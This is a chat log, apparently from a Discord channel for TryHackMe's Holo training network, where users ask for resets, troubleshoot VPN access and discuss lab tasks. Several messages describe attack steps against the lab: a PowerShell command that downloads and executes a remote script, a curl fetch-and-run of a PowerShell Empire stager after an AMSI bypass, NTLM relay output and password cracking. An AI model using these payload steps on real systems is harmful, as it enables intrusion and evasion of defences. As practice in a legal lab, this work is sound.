Hey Jedis. This my second go at this network. If anyone wants to link up to work on it together let me know. Hacker's unite!!!!!!
could be several of us scanning 33 at the same time. I had to change some of my scans to a lower thread. Right now I can't reach 33 either. crossing fingers it responds soon lol. Just realized my subnet is .109.33 so we both in the same boat.
We need 2 more for the reset. System is still showing "Destination Host Unreachable"
WB back baby!!!!!!
Can I get a reset on 10.200.114.0/24 please, L-SRV01 has crashed and continues to be unresponsive
Can I get some love on .109.33 and can we thread our scans a little lower. admin.holo.live is becoming unresponsive. I can get pings but the site is not loading when trying to log in. Hackers UNITE!!!!!!!!!!!
Working on Task 21. The user that should be in the shadow file is not there, not sure if it was overwritten by a user or something I am missing. Any advice would be cool?
we in business 
THM staff are not here to offer help with content
I am connected via the holo vpn but the network seems to be hosed. i am unable to get any response from the 10.200.95.33 machine and, even though I am connected via VPN (verified on the Access page) I am unable to click the reset button to vote for a reset because the page thinks that I am not connected
I downloaded the VPN profile for Hololive and always get a zero byte file.
Try this?
Thanks for your prompt suggestion, but my problem still persists
Gave +1 Rep to @spare beacon
wreath vpn profile can be downloaded, but only hololive returns an empty file
Tried that 3 times with no luck. Still get zero byte file.
Send a screenshot of your network diagram at the start of the room?
When I leave the one room and go to the jr room there's no option to join.
Is that correct?
Sent you a screenshot
Stuck on "Task 47". This is the second time I try a Win command that is supposed to restart the end point not shut it down. The documentation says "We can now restart the machine; it is essential that you restart the device and not shut down the device. Give the server a few minutes to restart; scan the server again and ensure it returns as closed."
CMD: shutdown /r
Attempted too:
xfreerdp
evil-winrm
Any update on the empty openvpn config file? Has the issue been fixed?
Guess not. Just tried again.
no more 69 subnet from the days of pre release holo testing
Just a homie asking for a reset
;-; website hasn't been responding (on the attack box)
Are you using the holo vpn?
$ gobuster vhost -u http://holo.live -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://holo.live
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
[+] Append Domain: false
2023/04/07 11:37:17 Starting gobuster in VHOST enumeration mode
Found: 1 Status: 400 [Size: 422]
Found: 11192521404255 Status: 400 [Size: 422]
Found: 11192521403954 Status: 400 [Size: 422]
Found: gc._msdcs Status: 400 [Size: 422]
Found: 2 Status: 400 [Size: 422]
Found: 11285521401250 Status: 400 [Size: 422]
Found: 2012 Status: 400 [Size: 422]
Found: 11290521402560 Status: 400 [Size: 422]
Found: 123 Status: 400 [Size: 422]
...
What am I doing wrong here?
I added the domain to /etc/hosts and when I try to ping the webserver, I get packets back. But gobuster just gives me Status 400 response
I would recommend this command ||gobuster fuzz -u http://FUZZ.holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --no-error --exclude-length 1016 -b 400-499||
use gobuster fuzz --help to get along with the command. Also remove some of the flags to understand it.
Thanks, for your help. That worked! I guess I need to invest more time into gobuster and its options
Hi
I connected to the network with the OVPN file. Had an issue with the data ciphers option, added it to the file as always. Established a connection successfully, checked it via the dedicated site.
Checked if the network is up and running for more than 8 minutes, recommended 5 usually isn't enough in my experience.
Then after attempting to get a port sweep of the subnet, I received "no-response" from 10.200.64.0, 10.200.64.1, 10.200.64.2, 10.200.64.3
Then got an error about probes being dropped from nmap only to realize my ovpn connection has been terminated for some reason
Restart your Kali machine, regenerate your VPN file, also I usually scan using the -Pn argument, it tends to play nicer to hosts that don't respond to ping, even if it did respond to a ping I do it either way because I've had issues like that with nmap in the past
Alright will try. I also tried using masscan but that went even worse. I assume networks don't take kindly to it?
Anyway, I will post here again once I get this over with. Got such a headache I can barely think straight lmfao.
Thanks !
Gave +1 Rep to @drifting ravine
You can also message me directly if you have any issues, whatever you prefer, I don't mind
today holo is giving problems
someone can totally reset the network 10.200.95.0/24?
plus if one uses nc in the rce... and if the nc session gets cancelled in the terminal with ctrl+c ... the server keeps hanging... making it impossible to work with
I'm getting crazy here
I think someone fucked up the port 80 of the first webserver
Please God of the Server, gives us a Manifestation, tell us how stupid we are and get rid of our stupid problems!

@zenith delta
ping ping ping!
stabilise the shell mate
22 / ssh is allowed. You can also make an ssh backdoor then. Gosh I hate the word
?? I don't even have a shell in there I cannot even reach port 80 to gain the first foothold
ip 10.200.95.33
is that right?
you look sus
I meant this
yeah same
Honestly, this is sad. I've been going insane thinking all of the issues I've been met with when attempting this network were on me.
Shame I don't have money to spend on my own lab
That's what I get for not having a job once in my life
xD don't be hard on yourself... this should be a service to people that might want to pay too... plus it should be treated with TLC because the aim of the platform IS NOBLE
But honestly the reset timer and the counter shouldn't be that high
Ill now try to leave the room and rejoin it in 30 minutes hoping the network IP assigned to me won't be the same otherwise Ill kill myself
ffk
mate I paid for it though haha. For THM subscription I mean
Nvm I thought raspberry pis weren't this cheap.
Well, time to see if learning how to setup a lab on my own network is worth the effort. If so I'll just work on that instead of public ones here LOL
I've been doing a lot more theory lately , making notes etc. instead of practice so I thought I was rusty af and missing smth
but you are right, this is paid service... we shouldn't be too laid back about that...
Admins since this is not probono charity will you answer my prayers and please reset the 10.200.95.0/24 holo network?
I reached the 80 on the 10.200.95.33 thank you jeeeezuz
Anyone know if there's problems with the .33 host atm?
Seen the posts above and I can't seem to scan / interact with .33 on the 10.200.114.0/24 subnet.
You got it? Perfect, sorry sir I wasn't online
Restart your Kali machine and VPN
Unfortunately same issue, can see and interact with 250, but 33 is a no go. Cheers though!
You can always vote to reset the network, that's what I do usually after making sure I restart my machine and connect to the VPN
Ya, think a few others on the same subnet may be having a similar issue.
doh!
nudge 
weirdly, it's just popped up.
If anyone was reading this and did something, thankyou 
same issue here... the server .33 is hanging after a nc session went off
it seems there isn't a daemon set in there that will restart to a default state all the processes after a while
but I say that the issue might be resolved with a lower restart counter
this is not good guys...
it has been already 30 minutes
-.-
In the whole day today I must have wasted something like 1.45 hr for this kind of issues
Yeah I abandoned hope for doing this network for the foreseeable future.
Yeah, the .33 is messy. But once you get through it, there aren't any issues.
Love your bio
. I love messing with AD. I dont get to do any of it in my current intern tho
.
; -;
How did you get an internship may I ask? I'm self taught and while I love this , I'm kinda anxious about how one gets a job after getting a certificate.
and you know, just how this whole "job" thing works ||cold sweat||
After getting OSCP, i just did the "spray and pray". Got an intern working webapp pentests at a startup which has evolved into a fulltime-ish role which I can legally only call an intern. Almost a year working with them so I do other things too not just pentests.
Its getting your resume on the right desk at the right time i feel.
Aighty. Thanks. Glad to know there just might not be some secret knowledge required to get a job !
Gave +1 Rep to @storm sun
Good english and communication is a must js. I have seen my manager shun ppl just for that.
But yeah, other than that it just varies. Some ppl need a very specific thing in their new employees and thats what they ask in interviews.
I was asked webapp ques only. Nothing too over the top. Having oscp was a boost to my application since i wasnt 100% sure of answers and the interviewer could tell that.
Okay, anything outside the scope of OSCP then? I've heard a number of people with OSCP had problems with at least a few questions during interviews. Blind SQLi and other stuffs. Any tips what should I learn about after getting it?
Upto the role you are applying for i guess. Pentester roles sometimes want you to have some exp with android/ios too. You cant really fit the criteria for all job roles which say pentester because all of them have different job descriptions haha.
CySec is too broad to guess what your interviewer will ask you i feel. Apart from the things like CIA triad sometimes and things like OWASP TopTen.
Spray and Pray is the solution to finding a role that suits you.
"Try harder" even when it comes to finding a job it seems. Welp, such is life
Thank you so much for answering all of my questions. They certainly helped clear the cloud of uncertainty that's been following me for quite some time now.
I'll be going now.
Good luck and happy hacking !
anyone else have issues reaching dev.holo.live? I can connect to the main site
Holo Network is mega unstable... or perhaps it's just me
Task43: If someone can give me a hint on which scheduled task I need to hunt, I tried to dump all services and scheduled tasks, then compare if there is any similarity but I can't really find anything ...
Facing Issues with Holo VPN
I can't download the vpn file for Holo Network. Trying to download it goes to the 404 error page (Lost in matrix). Tried regenerating the file, restarting my computer, changing browser to access Tryhackme. But nothing worked. The other networks work.
Can you leave the room for 15 minutes, then re-join?
okay
Doesn't really work, I checked similar thing some time ago. But I'll do it again
I know that Holo is shared - but in all fairness, for the majority of the lab networks I would pay extra to allow for private sessions. The amount of times the lab failed and needed to be reset is silly...
Hi someone can please help me with AV evasion? I'm searching a proper payload for powershell empire...
or in any case ... the way you used to hack into the 10.200.x.33
(when you uploaded the covenant shell)
I used hoaxshell standalone listener along side with the cmd-curl payload
Bake the payload in a php wrapper to execute it and you are good to go
So you used hoaxshell alone, or alongside powershell-empire to then inject in memory modules?
Just throwing it out there - but sometimes a simple substitution goes a long way:
powershell "IEX(New-Object Net.WebClient).downloadString('http://<address>/<agent>.ps1')"
Anyone also having issues connecting to Holo today?
If i use the command you shared... Ill get an error that tells me that the payload im using (which is a powershell empire payload) has too many characters
You mean my approach? I use it regularly to load a sliver binary wrapped in powershell... that is 80+ megs of data, and it works without flaw. Can you share your screen output?
That's great ill share asap
[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6560964). Try redirecting the command's output to a file and transferring it to your machine
What did I do?
- I run a php rce, got a php cmd webshell,
- I inserted the hoaxshell payload in the php shell,
- From within the hoaxshell, I bypassed the Amsi
- in the same powershell session, I tried to run the command you used to reach for my powershell empire payload,
- the command I used is:
IEX(New-Object Net.Webclient).downloadString('http://10.x.x.8x:443/download/powershell/[BASE64ENCODEDPATH]')
- the response is:
[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6560964). Try redirecting the command's output to a file and transferring it to your machine
If I do:
curl http://10.x.x.8x:443/download/powershell/[BASE64ENCODEDPATH] -o paypay.ps1
And then:
./paypay.ps1
It says: "[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6546960). Try redirecting the command's output to a file and transferring it to your machine"
If I just copy and paste the code in the hoaxshell, it prints out:"[Fail] There was an error reading the response, most likely because of the size (Content-Lenght: 6585388). Try redirecting the command's output to a file and transferring it to your machine"
It actually hit the powershell-empire server but then that error comes out
Can I change the way powershell-empire send stagers?
[ERROR]: B: admin/get.php requested by 10.200.111.31 with no routing packet.
Something odd seems to be going on in my end. After the network reset, the 10.200.x.x web server now has a 192.168.100.x IP on the tryhackme network diagram. I tried scanning the old IP at 10.200.x.x and it showed only SSH was up. Network uptime is 21m.
Even mysql is running on it. Everything as it was but nothing on port 80!
Hi guys, I'm working on Task 47 NTLMrelayx task. I received connectivity from the DC but fail to establish connection
[*] SMBD-Thread-54: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, attacking target smb://10.200.107.30
[-] SMBClient error: Connection was reset
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] SMBD-Thread-57: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, but there are no more targets left!
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] SMBD-Thread-57: Connection from HOLOLIVE/SRV-ADMIN@127.0.0.1 controlled, attacking target smb://10.200.107.30
I tried suggested solutions such as ntlmrelayx v0.9.22. The connectivity between attacking device and DC is also fine and my proxychains is version 4. If anyone has an idea, please let me know. Thanks!!
Ah little detail: I'm using sshtunnel to reach the server i need to reach
I cannot send screens
Is the .DLL hijack bugged?
because it asks me to be administrator but Im just a user... plus there is no Scheduled task with that kav*.exe
still not working
Hi, I'm connected to Holo's VPN but I get no pings or open ports via nmap to any of the stations on the network
anyone having issues logging in to a***n.holo.live even after reset?
Hi, I am on task 8 it says 10.200.x.0/24 as the target network.
Not sure if I understood that correctly but does it mean any IP from 1.0 to 254.254
something like that
?
and also how to translate that to nmap instruction
If you're still here, this helped. Thanks for posting.
Gave +1 Rep to @quiet raft
My rustscan seems to be going on for pretty long, is my command right ? it is for task 8. I am not too sure about the network selection though.
||rustscan -a 10.200.109.0/24 -t 5000 -u 5000 | tee rust_holo.txt ||
Appreciate all inputs. the task says scope of engagement in 10.200.x.0 ?
My assigned IP is 10.50.109.108
Hi, are there any official THM reps in the channel ?
You've made a guess here that 10.50.109.108 means your subnet is 10.200.109.0/24?
Have you looked at the network map at the top of the page?
THM staff aren't here to provide support with content
Any support with content is provided on a volunteer basis
yeah, I looked at the network map & to the IP I was assigned and considering that the subnet would collide
I assumed
Please can you be more specific? What's in the map?
They're 10.200.something.something in the map right? With the exception of a 192.168 address?
I can't paste images somehow , but yeah there is a ||10.200.112.33||
Ok, so x in your case is 112
Because I completed wreath earlier so I assumed someone might have solved it this far hence the map is open :D. So my question would be that these hosts on the network are not necessarily pivots to the internal network ? I mean if I have the host why would I be scanning the network and would only be focusing upon the ports on the 10.x host in the diagram. Hope I am making myself clear ?
The map is only for you individually
Thank You! ❤️
Gave +1 Rep to @quiet raft
Not quite sure what you're trying to say here
ok, if I may elaborate. Task 8 says to scan the subnet, while we already have the host identified in the network diagram. So do we still have to scan the network or can we directly jump to the host looking for open ports.
You've got the IP of a single host
Within the network
Wouldn't it make sense to go looking for more hosts?
yeah it does, so it might not necessarily be a pivot or have the required ports open. I see the point
Thanks for that.
Not just that. You want to know the lay of the land. What's out there? Whether systems might be talking eg a database server and a webapp server
I am new here just joined today, is there someone I have to request some roles, I see I cannot paste pictures in the chat.
Follow those steps and you should then be able to post images, plus you'll get your shiny THM level here
Thanks much!
Done. And images work. Awesome.
I think Holo is broken, it's stuck on Resetting for a while now
3 hours later, still stuck on Resetting.
leave room and then join again, it will give you another subnet
Bro at task 21 , I can't get any hashes from the shadow and passwd file whats can i do ??
Tell me fast because today i want to complete this Network
do you already escape the container?
@royal wren
thank you
Gave +1 Rep to @pearl apex
Hey guys, any idea why I can't get a reply from the public-facing server? I got the IP right (||10.200.107.33||) and VPN connected, yet I can't get any response from either nmap or ping
Make sure u have started the holo network machines first
I did
I'm working on it right now ,its fine actually
Did u generate the vpn file for holo network specifically ?
Yeah, guess something must be wrong with the vpn config
Whenever u download the vpn file ,always regenerate it
And then download
And in my case, I finished wreath previously and then started holo, but for some strange reason I was connected to the wreath vpn (I had two network card interfaces, i.e. tun0 and tun1). I restarted my virtual box again. It was fine
So once check with ifconfig , if u have this issue too
Nope... I'll try leaving and rejoining
Click regenerate and then download the vpn file again for holo network
Is the Holo network hung? For me it looks like it is stuck on "resetting"
Refresh your page
I did.
Although it's true I can't connect... huh
And the odd thing is the reset vote section is 4/5 so seems to be hung or something.
2/5 and running for me
Very strange for sure.
Then restart ur pc and seee
R u using virtual box or ur own machine ?
My own machine
but restart doesn't help...
It's an M1 MacBook pro
Okay, So u r using linux dual boot or something like that ?
For Me i was using kali virtual box ,i simply closed it and opened it ,And i didn't have like tun interfaces .
MacOS
U use MacOS for hacking?
Yeah
Yeah, there's something keeping utun0-utun2 occupied from the system
I never tried using my host os for these purposes ,Kali linux comes with all tools installed and its easy to use too
Maybe check some forums for it
I remember once i connected radmin vpn in my windows ,the interface kept showing forever .
Ig anyways u would have used tryhackme several times so u must be familiar already . When u connect to the vpn ,does it show initialization complete?
Yeah, it shows connected both in OVPN and in THM
At times when u switch ur wifi too ,It won't connect
And u tried pinging that .33 address and it didn't work ?
yeah, got time out
Did u try accessing the web page ?
Doesn't seem to work either
Very weird and ur holo network ,does it show running ? Refresh it and see once
Yeah, running
Contact the tech support for help maybe and see
The problem is this is not a THM issue
Might be ,i'm not familiar with MAC OS ,so idk how to help u .
Guys i dont know whoever faced this issue after getting the creds through LFI on admin.holo . i am not able to get login to the dashboard
Could anyone help me out to rectify this issue
@still nimbus
You can get into the dashboard ,the issue is lot of ppl r bruteforcing and using stuffs like gobuster and hence we are unable to log in .
I was able to get in once today but after that it has not been possible
It would be great if ppl reset the machine
Please don't ping staff for help, that's not what they're here for
There are several instances, please make sure you specify which instance you're on when asking for resets. The instance is the third octet of the machine IPs
10.200.95.33 ie 95
@buoyant plover thank you so much
Gave +1 Rep to @buoyant plover
My apologies
In my case the .35 machine has some issue .I'm unable to connect to it via rdp and i can't even access the shares of the machine .Its seems to be up tho ,i was able to do nmap scan and ping it . My ip 10.200.95.33.
similar for me .... the ports are filtered / tcpwraped
i didn't get it as filtered tho ,Maybe u r scanning it from kali machine without port forwarding/ proxychains might be why u r getting it as filtered.
rechecked + rescanned, now they do not appear as filtered (I could swear ~1h ago they were filtered) ... (I am using sshuttle)
but the RDP is not working.....smb shares not available
@buoyant plover sent in PM the error for RDP
Hey gentlefolks - anyone ever run into issues later on in life with Google Colab? I just got a permanent ban for "potential abuse" of the platform.
Is the root password crackable? (Already got other two hashes)
Default rockyou didn't help.
Using NVIDIA GeForce RTX 3050 Ti with the command: hashcat -O -a 0 -m 1800 hash.txt -r OneRuleToRuleThemAll.rule rockyou.txt the estimate is ~92 days.
Task 37:
~~Why are remmina & xfreerdp failing while rdesktop works? Is it set up that way or simply a bug?~~ Stupid thing started working correctly.
Nmap scan says there's no SMB service running on that host either (so both cme and evilwinrm are failing too).
Task 39:
Do I have to install .NET frameworks on the target?
Appreciate any help in Task 8 in the Holo room, I can't access the webserver of the first machine.
I can see that the port is open but can't access it, also no info using -A command.
admin.holo is pain, can't get rev shell, always timeout
Unable to connect to the network after a while. The network is running, VPN is connected but cannot ping the entry point.
Even rebooted my machine
Same here - I gave up 75% in.
Hey! Can anyone assist with the last task?
the entrypoint in the 10.200.109.X should be reviewed. It should not be the norm to have to wait up to a minute or more just for a command to process.
Can someone solve my issue
When I connect openvpn it shows connected, but when I ping the machine, ping doesn't respond.
are you sure you have access to the machine
because it's a network and there are multiple machines
only one machine is public facing which is holo.live
i want help for the amsi and anti virus bypass
im stuck
hi guys
i have a question
if i want to ping a server out of my network subnet ... would my pc make an arp request to know what is the mac address of my default gateway or it wont if its already stored in arp table
after dll hijacking, adding a new administrator, whenever I stop smb for NTLM Relay Attack, I'm not able to log in with my new administrator
but before stopping it's fine and I can easily log in using xfreerdp
it says username or password incorrect
hi, isn't this supposed to show PC-FILESRV01 and FILE-SRV01?
No i think it's good because 30 is a domain controller, and you have to perform NTLM Relay attack
@surreal storm
https://systemweakness.com/remote-ntlm-relay-attack-relay-through-a-proxy-7f155dc478b2
Walkthrough of DC takeover
thanks I'll look into this tonight
but it was working fine a few days ago without having to do this, then I disconnected from the machine and it didn't work anymore
I just had the sshuttle from the linux machine
how to hack feces
if you are done with domain controller takeover I have some questions, can we discuss
My holo is ded
I may be stupid on this, but I could not get the holo initial recon step to run. I tried enumerating the machine every way I could think of for the vhosts with no results. When I run the command gobuster vhost http://10.200.110.30 -w <list> I return everything as a 200 as it seems to just redirect to the internet site selling the actual domain. Does anyone have a tip for this? I cheated and got the vhosts from a walkthrough, but that was a frustrating couple of hours.
Can anyone vote a reset? Someone just messed up the L-SRV01 and it is now only showing the apache2 default page.
I got a shell via hoaxshell but can't connect to 10.200.110.31 via RDP does it need a restart?
Can you guys click reset please, the network is broken (.114 subnet)
hi! broken reset button and the vpn does not connect to network
actually I think we all have the same problem, the PC doesn't restart at this step
it just stays shut down
does anyone have access to the network?
my ip assignment does not allow to reach the first server (L-SRV01). server 192.168.100.1 - vpn 10.50.x.x
I use remmina to rdp to .31 and then rdp from .31 to .35 and it works. RDP directly to .35 always comes back with error when netlogon is disabled
the network remains without access, for weeks with attempts to do what is recommended here (Discord). I was not able to solve it
using VPN or AttackBox, the first server on the network is not reached
how can I get support with this case? is it possible here to contact the staff member who reviews HOLO? @bronze wigeon @pale plover
Have you already reset the network?
Also I doubt you are supposed to ping 192.168.100.1
yes i did, on multiple occasions
what should i do? how to check connection?
Did you try to ping or scan the DC and/or L-SRV01?
thank you for checking the network status. i'm going to repeat the scan looking for the "octet" again
I'm having the same problem. First with machine Relevant, then the Holo, and now Wreath network. In the access page it shows I'm connected. When I go to the room the access machines page isn't highlighted. I do have my attack ip address in the top right but I can't seem to access anything.
Are you using separate VPNs for Holo and Wreath?
So can someone maybe help explain the JSON User Token section for Task 28? I had to look up a walkthrough and I'm still confused about how this worked or how I was supposed to figure it out in the first place.
||I get that the bug works by taking the token submitted by the server in the response from the password reset page, because of how it handles the logic for resetting the password in the first place, but I'm not quite sure how I was supposed to put together that I was supposed to submit it as a field to another page entirely. I think reset.php is a redirect from the password reset form? But I'm not sure how I was supposed to be able to figure that out.||
^ Spoilers for Holo.
I don't say this to mean that Holo is poorly designed or anything like that. But it's more--I don't know enough about web applications to have understood which dots I needed to connect, so to speak, to understand what I should have done with this token once I got it. So because of that, I didn't know what to research to begin to understand that, so if there's any resources someone can point me towards to better understand this specific vulnerability, that would be fantastic.
Hi! I have an issue with the webserver of Holo. Logging into the admin dashboard is super slow (minutes!). Maybe someone is killing mysql?
@worldly aurora Can you maybe tell me what to do in this situation?
Hey, I have been working with holo network from tryhackme but pivoting isn't working. I tried chisel, sshuttle, autorun, ligolo-ng. I think this is a machine issue, can someone help me configure it
Hey, trying to work through holo but getting host unreachable when trying to ping L-SRV01, same thing from attackbox too
is that not a windows machine?? as those don't always respond to pings
I can't communicate with any machine on the network. Not just not pinging
I'm having the same problem, I have both www.holo.live and holo.live added to /etc/hosts but it keeps loading the public domain. Any solutions to that problem?
I don't think so unfortunately
Hello..
I cannot transfer chisel binary to container due to lack of permissions… any idea where I can save it?
Try /tmp/
Great.. It worked. Thanks
Gave +1 Rep to @spare beacon
I've got the same bug, I even just tried both right subdomains in a new text file, and haven't found any special status code or length different from other false positives, previous answers to this don't work anymore
It's quite frustrating thinking you're doing something wrong, but that's just the room, it's completely broken whatever the commands or the tools you're using
It works with ffuf
Hi, anyone else to reset the network (108.33)? port 80 on L-SRV01 seems broken, it worked yesterday:
nmap gives the same kind of result, only port 22 seems open
Hi, I don't understand something in task 23: after setting my tunnel, I still can't ping the other "internal" hosts, is this supposed to work like this?
I can ping them directly from the compromised host (.33). I thought I could ping them by proxying it, so I don't really understand why, is there any firewall rule only allowing .33 to ping them? And in that case, why doesn't the proxy tunnel work as expected?
Any clue?
I know that I can just upload a tool to enumerate stuff directly on the compromised machine, but why this step here then, if it doesn't allow remote interactions? Am I doing something wrong? Is it the only way of getting this?
I tried both chisel and sshuttle and both networks without result
10.200.X.0/24 is supposed to be the external network if I properly understood (.33 the "public facing server"), then 192.168.X.0/24 is the internal one, so why do other hosts have an "external IP" too in the diagram?
ok, sshuttle or chisel don't support ICMP protocol, they only operate at application layer but you still can nmap a remote target with sshuttle
probably with chisel too with proper options
I just don't understand the network design of this room, other machines should only have IPs considered as internal (192.168.X.Y) and nothing on 10.200.X.Y
Are you using sudo?
yes
I tried with the HTB openvpn file to see if my local machine was the problem but it runs fine
and the machine vpn runs fine too
and the wreath network runs fine too
is the holo network the problem
HTB and THM use different protocols?
Can you cat your file for me please?
I tried downloading and running, and my config was blank.
I've forwarded it on to staff
that's why it's giving you that error.
thanks
Gave +1 Rep to @spare beacon
so what's the procedure? I'll have a staff member DM me or something?
I'm not sure if they will, it could be a site wide issue, and they can sort it and then announce it's fixed.